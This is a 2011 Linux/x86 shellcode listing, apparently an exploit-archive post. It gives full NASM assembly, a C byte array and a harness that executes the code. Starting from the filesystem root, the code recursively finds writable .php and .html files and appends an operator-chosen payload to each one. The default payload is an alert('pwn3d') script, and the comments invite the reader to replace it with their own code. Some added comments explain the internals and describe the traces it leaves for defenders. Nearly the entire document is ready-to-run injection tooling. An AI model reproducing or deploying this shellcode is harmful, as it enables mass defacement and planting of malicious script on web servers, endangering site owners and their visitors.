
Linux/x86 Search For php,html Writable Files and Add Your Code


Linux/x86 Search For php,html Writable Files and Add Your Code

Code

; Title : Linux/x86 Search php,html writable files and add your code.
; Date  : 2011-10-24
; Author: rigan - imrigan [sobachka ] gmail.com
; Size  : 380 bytes + your code.
;
; Note  : This shellcode appends your code to the end of each file it
;         finds. Your code is added only to .html and .php files.
;         The search for files is carried out recursively.
 
  
 
BITS 32                                 ; NASM syntax, IA-32 Linux, raw int 0x80 system calls
 
section .text
global _start
_start:
;======================================================================;
;                               main                                   ;
;======================================================================;
; Entry point: chdir("/"), leave a ".\0" string on the stack as the
; argument `search` reads at [ebp + 8], run the recursive walk, exit(0).
; Every constant is built from xor/push/sub/byte-moves so that the
; encoded instruction stream contains no 0x00 byte (the hex dump in the
; C harness below has none, which is what lets strlen() report its size).
              ; chdir("/") 
                xor eax, eax
                push eax                ; four zero bytes: NUL terminator
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2f    ; '/'  -> esp points at "/\0"
                mov ebx, esp            ; ebx = path
                mov al, 12              ; __NR_chdir
                int 0x80
             
                xor eax, eax
                push eax                ; NUL terminator
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e    ; '.'  -> ".\0" is left on the stack; after the
                                        ; call below it sits at [ebp + 8] inside `search`
                
                jmp SHORT .exit
 
.jmp_search:
                jmp SHORT search        ; trampoline: `search` is entered through a call
                                        ; into this short jump, so its `ret` lands on the
                                        ; exit(0) sequence below
 
.exit:
                call .jmp_search        ; run the directory walk starting at "/"; eax == 0 here
          
              ; exit(0)  
                xor eax, eax
                xor ebx, ebx            ; status 0
                mov al, 1               ; __NR_exit
                int 0x80
 
;======================================================================;
;                               inject                                 ;
;======================================================================;
; void inject(void)
; In:    edi = NUL-terminated file name (relative to the cwd)
;        esi = address of the payload bytes (set by .write via call/pop)
; Out:   nothing meaningful; eax holds the last syscall's return value
; Clobb: eax, ebx, ecx, edx, flags
; Appends the payload to the end of the file: open, seek to EOF, write,
; then a close whose descriptor argument is 0 (see the note below).
; None of the syscall results are checked.
inject:
               ; open("file", O_RDWR)   -- ecx = 2 is O_RDWR (O_WRONLY would be 1)
                xor eax, eax
                mov ebx, edi            ; ebx = path
                xor ecx, ecx
                mov cl, 2               ; O_RDWR
                mov al, 5               ; __NR_open
                int 0x80
                                                
              ; lseek(fd, 0, SEEK_END)
                xor ebx, ebx
                mov ebx, eax            ; ebx = fd; on failure the -errno value is used as fd
                xor ecx, ecx            ; offset 0
                xor eax, eax
                cdq                     ; edx = 0 (sign-extension of eax == 0)
                mov dl, 2               ; SEEK_END
                mov al, 19              ; __NR_lseek
                int 0x80
     
              ; write(fd, your_code, sizeof(your_code)) 
                xor eax, eax
                mov ecx, esi            ; buffer = payload
                mov dl, 43   ; <- TO CHANGE THE SIZE HERE.  (43 = length of the db string below)
                mov al, 4               ; __NR_write; ebx still holds fd
                int 0x80
 
              ; close(fd) -- ebx is zeroed right before the call, so this is
              ; close(0): stdin is closed and the descriptor from open() is not.
                xor eax, eax
                xor ebx, ebx
                mov al, 6               ; __NR_close
                int 0x80
               
                ret
                 
;======================================================================;
;                               substr                                 ;
;======================================================================;
; substr(name = edi, needle = esi)
; In:    edi = file name, esi = needle (".html" or ".php" from the caller)
; Out:   al = 2 if the needle occurs in name (substring, not suffix:
;        "x.html.bak" also matches); otherwise al is 0 when the needle's
;        first byte was never seen, or the needle byte that failed to
;        compare.  Callers test `cmp al, 2`.
; Clobb: eax, ebx, ecx, edx, flags.  edi and esi are preserved.
; Note:  the scan starts at name[1] (index 0 is never examined), and after
;        the first byte matches it compares forward once; a mismatch ends
;        the search without rescanning the remainder of name.
         
substr:      
                xor eax, eax
                xor ebx, ebx
                xor ecx, ecx            ; ecx = index into needle
                cdq                     ; edx = 0, index into name
 
loop_1:
                inc edx
                 
              ; edi contains the filename address
              ; esi contains the substring address
                mov BYTE bl, [edi + edx]
         
                test bl, bl
                jz not_found            ; end of name: eax is still 0
                 
                cmp BYTE bl, [esi]       
                jne loop_1              ; keep looking for the needle's first byte
 
loop_2:       
                mov BYTE al, [esi + ecx]
                mov BYTE bl, [edi + edx]
         
                test al, al
                jz found                ; needle exhausted: every byte matched
         
                inc ecx
         
                inc edx
                cmp bl, al
        
                je loop_2
         
                jmp short not_found     ; mismatch (or name ended first): al = needle byte
 
found:
                xor eax, eax
                mov al, 2               ; return value 2 = match
         
not_found:
                
                ret
                 
;======================================================================;
;                               search                                 ;
;======================================================================;
;This function recursively finds all writable files. [php, html]
;
; search(dir = [ebp + 8])
; In:    after the prologue, [ebp + 8] = NUL-terminated name of the
;        directory to open.  Both callers (_start and the recursive call
;        in .l3) push ".\0" just before the call and have already
;        chdir()ed into the directory.
; Out:   none.  Before returning it chdir("..")s back out.
; Clobb: eax, ebx, ecx, edx, esi, edi, flags.
; Frame: `sub esp, 250` opens a scratch area addressed relative to esp,
;        not ebp:  [esp + 0]   struct stat64 buffer for lstat64
;                  [esp + 100] struct old_linux_dirent
;                  [esp + 110] its d_name (d_ino 4 + d_off 4 + d_reclen 2)
;        [ebp + 12] holds the directory fd; this overwrites the caller's
;        stack just above the "." string (the NUL at [ebp + 9] survives).
;        The pushes in .l3/.check_html/.check_php are never popped, so esp
;        and both buffers move down on every iteration; `leave` discards it.
; Walk:  for each directory entry: skip names starting with "." or "proc";
;        skip symbolic links (lstat64 st_mode & S_IFMT == S_IFLNK);
;        if chdir(name) succeeds, treat it as a directory and recurse;
;        otherwise, if access(name, W_OK) == 0 and the name contains
;        ".html" or ".php", call inject to append the payload.
; Defender's view: the effect is a fixed block of bytes appended to every
;        file containing ".html"/".php" that the running uid may write to,
;        reachable from "/" (dot-entries, symlinks and "proc*" names are
;        never visited).  Files the uid cannot access(W_OK) are untouched,
;        so document roots that are read-only for the service account are
;        not modified; integrity monitoring of web content and an
;        unexpected trailing <html> fragment at EOF are the artifacts.
search:
                push ebp
                mov ebp, esp
                 
                 
                mov al, 250             ; eax is 0 on entry from both callers, so this
                sub esp, eax            ; is `sub esp, 250` encoded without a 0x00 byte
                
              ; open(".", O_RDONLY)    -- ecx = 0 is O_RDONLY; [ebp + 8] = "."
                xor eax, eax
                xor ecx, ecx
                lea ebx, [ebp + 8]
                mov al, 5               ; __NR_open
                int 0x80
          
                test eax, eax
                js .old_dirent          ; open failed: step back out and return
       
                mov [ebp + 12], eax     ; save the directory fd
 
.while:
              ; readdir(fd, struct old_linux_dirent *dirp, NULL)  -- one entry per call
                mov esi, [ebp + 12]
                mov ebx, esi            ; ebx = dir fd (esi keeps it for the close below)
                xor eax, eax
                xor ecx, ecx
                lea ecx, [esp + 100]    ; dirent buffer
                mov al, 89              ; __NR_readdir (old_readdir)
                int 0x80
          
                test eax, eax
                jnz .l1                 ; nonzero (including a negative error) is taken as an entry
 
              ; closedir(fd)  -- end of directory: close(fd)
                xor eax, eax
                xor ebx, ebx
                mov ebx, esi
                mov al, 6               ; __NR_close
                int 0x80
 
.old_dirent:        
              ; chdir("..")
                xor eax, eax
                push eax                ; NUL terminator
                push WORD 0x2e2e        ; ".."
                mov ebx, esp
                mov al, 12              ; __NR_chdir
                int 0x80
 
                leave                   ; drops the frame and everything pushed into it
                ret
 
.l1:
                lea edx, [esp + 110]    ; edx = d_name
                 
                cmp DWORD [edx], 0x636f7270   ; If the /proc filesystem detected... (first four name bytes == "proc")
                je .while                     ; ...next dir
          
                cmp BYTE [edx], 0x2e    ; names starting with '.' (".", "..", hidden entries) are skipped
                jne .l2
                 
                jmp  .while
 
.l2:
              ; lstat(const char *file, struct stat *buf)   -- syscall 196 is lstat64; buf at [esp]
                mov ebx, edx
                mov ecx, esp
                xor eax, eax
                mov al, 196             ; __NR_lstat64
                int 0x80
          
                mov cx, 61439           ; 0xEFFF, +1 below = 0xF000 = S_IFMT   (the inc avoids
                mov bx, 40959           ; 0x9FFF, +1 below = 0xA000 = S_IFLNK   a 0x00 byte)
                inc ecx  
                inc ebx
                mov eax, [esp + 16]     ; st_mode (offset 16 in struct stat64)
          
                and ax, cx
          
                cmp ax, bx
                jne .l3
                 
                jmp .while              ; symbolic link: skip it
 
.l3:
                xor eax, eax
                push eax                ; build ".\0" on the stack; it becomes [ebp + 8]
                sub esp, BYTE 0x1       ; of the recursive call below
                mov BYTE [esp], 0x2e
          
              ; chdir("file")          -- eax is 0 here, so only al needs setting
                mov ebx, edx
                mov al, 12              ; __NR_chdir
                int 0x80
          
                test eax, eax
                jne .l4                 ; chdir failed: not a directory (or not enterable)
          
                call search             ; it is a directory: recurse (eax == 0 on entry)
                 
                jmp .while
 
.l4:  
              ; access("file", W_OK)      
                xor eax, eax
                mov ebx, edx
                xor ecx, ecx
                mov cl, 2               ; W_OK
                mov al, 33              ; __NR_access
                int 0x80
          
        
                test eax, eax
                jz .check_html          ; writable by this uid: check the name
                 
                jmp .while
 
;======================================================================;
;                               check_html                             ;
;======================================================================;
.check_html:
                xor eax, eax
                push eax                ; NUL
                push DWORD 0x6c6d7468   ; "html"
                sub esp, BYTE 0x1       ; .html
                mov BYTE [esp], 0x2e    ; '.'  -> ".html\0"
                 
                mov esi, esp            ; needle
                mov edi, edx            ; name
                call substr
          
                cmp BYTE al, 2
                je .do_inject
 
;======================================================================;
;                               check_php                              ;
;======================================================================;              
.check_php:    
                xor eax, eax
                push eax                ; NUL
                push DWORD 0x7068702e   ; .php  -> ".php\0"
                
                mov esi, esp            ; needle; edi still = name
                 
                call substr
                 
                cmp BYTE al, 2
                je .do_inject
                 
                jmp .while              ; neither substring: next entry
 
;======================================================================;
;                               do_inject                              ;
;======================================================================;
.do_inject:
                jmp SHORT .your_code    ; jmp/call/pop pattern: .write receives the payload address
                 
.write: 
                pop  esi    ; Get the address of your code into esi
                 
                call inject             ; edi = name, esi = payload
                 
                jmp .while
 
;======================================================================; 
;                               your_code                              ;
;======================================================================;
 .your_code:
               call .write              ; pushes the address of the bytes that follow
                                                                                                
; Here a place for your code. Its size should be allocated in the
; register dl. Look at the "inject" function.                                                              
                                                                                                
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it.  (43 bytes, matching `mov dl, 43` in inject)
 
; Don't forget to change the size of your code!
------------------------------------------------------------------------
                          
              
              The equivalent shellcode, as a C byte array, is shown below.
                               
 
#include <stdio.h>
#include <string.h>
 
/* The listing above, assembled: 380 bytes of code (23 lines of 16 plus
 * 12) followed by the 43-byte payload string.  No byte is 0x00, so the
 * strlen() in main() reports the full length.  The stack-built strings
 * ("..", "html", ".php"), the "proc" compare immediate and the repeated
 * int 0x80 stub (\xcd\x80) are visible in the clear in this dump. */
char shellcode[] =
                             
    "\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2f\x89\xe3\xb0\x0c\xcd\x80"
    "\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\xeb\x02\xeb\x63\xe8\xf9"
    "\xff\xff\xff\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x31\xc0\x89\xfb\x31"
    "\xc9\xb1\x02\xb0\x05\xcd\x80\x31\xdb\x89\xc3\x31\xc9\x31\xc0\x99"
    "\xb2\x02\xb0\x13\xcd\x80\x31\xc0\x89\xf1\xb2\x2b\xb0\x04\xcd\x80"
    "\x31\xc0\xb0\x06\xcd\x80\xc3\x31\xc0\x31\xdb\x31\xc9\x99\x42\x8a"
    "\x1c\x17\x84\xdb\x74\x1a\x3a\x1e\x75\xf4\x8a\x04\x0e\x8a\x1c\x17"
    "\x84\xc0\x74\x08\x41\x42\x38\xc3\x74\xf0\xeb\x04\x31\xc0\xb0\x02"
    "\xc3\x55\x89\xe5\xb0\xfa\x29\xc4\x31\xc0\x31\xc9\x8d\x5d\x08\xb0"
    "\x05\xcd\x80\x85\xc0\x78\x22\x89\x45\x0c\x8b\x75\x0c\x89\xf3\x31"
    "\xc0\x31\xc9\x8d\x4c\x24\x64\xb0\x59\xcd\x80\x85\xc0\x75\x19\x31"
    "\xc0\x31\xdb\x89\xf3\xb0\x06\xcd\x80\x31\xc0\x50\x66\x68\x2e\x2e"
    "\x89\xe3\xb0\x0c\xcd\x80\xc9\xc3\x8d\x54\x24\x6e\x81\x3a\x70\x72"
    "\x6f\x63\x74\xc6\x80\x3a\x2e\x75\x05\xe9\xbc\xff\xff\xff\x89\xd3"
    "\x89\xe1\x31\xc0\xb0\xc4\xcd\x80\x66\xb9\xff\xef\x66\xbb\xff\x9f"
    "\x41\x43\x8b\x44\x24\x10\x66\x21\xc8\x66\x39\xd8\x75\x05\xe9\x97"
    "\xff\xff\xff\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\x89\xd3\xb0"
    "\x0c\xcd\x80\x85\xc0\x75\x0a\xe8\x65\xff\xff\xff\xe9\x79\xff\xff"
    "\xff\x31\xc0\x89\xd3\x31\xc9\xb1\x02\xb0\x21\xcd\x80\x85\xc0\x74"
    "\x05\xe9\x64\xff\xff\xff\x31\xc0\x50\x68\x68\x74\x6d\x6c\x83\xec"
    "\x01\xc6\x04\x24\x2e\x89\xe6\x89\xd7\xe8\x09\xff\xff\xff\x3c\x02"
    "\x74\x18\x31\xc0\x50\x68\x2e\x70\x68\x70\x89\xe6\xe8\xf6\xfe\xff"
    "\xff\x3c\x02\x74\x05\xe9\x30\xff\xff\xff\xeb\x0b\x5e\xe8\xb9\xfe"
    "\xff\xff\xe9\x23\xff\xff\xff\xe8\xf0\xff\xff\xff"
    // <html><script>alert("pwn3d")<script></html>   -- the 43-byte payload (what `mov dl, 43` writes)
    "\x3c\x68\x74\x6d\x6c\x3e\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c"
    "\x65\x72\x74\x28\x22\x70\x77\x6e\x33\x64\x22\x29\x3c\x73\x63\x72"
    "\x69\x70\x74\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e";
     
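/*
 * Test harness: prints the byte count of `shellcode` (the listing's "Size"
 * field claims 380 bytes plus the payload) and then transfers control into
 * the array by casting it to a function pointer.
 *
 * strlen() stops at the first 0x00 byte, so the count is only meaningful
 * because the array contains none.  The indirect call only proceeds if the
 * page holding the array is mapped executable; otherwise it faults at the
 * first instruction.  The original printed a size_t with "%d"; "%zu" is the
 * matching specifier, and strlen() needs <string.h> to be declared.
 */
int main(void)
{
  printf("%zu\n", strlen(shellcode));   /* size_t -> %zu */
  (*(void (*)()) shellcode)();
  return 0;
}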
                              
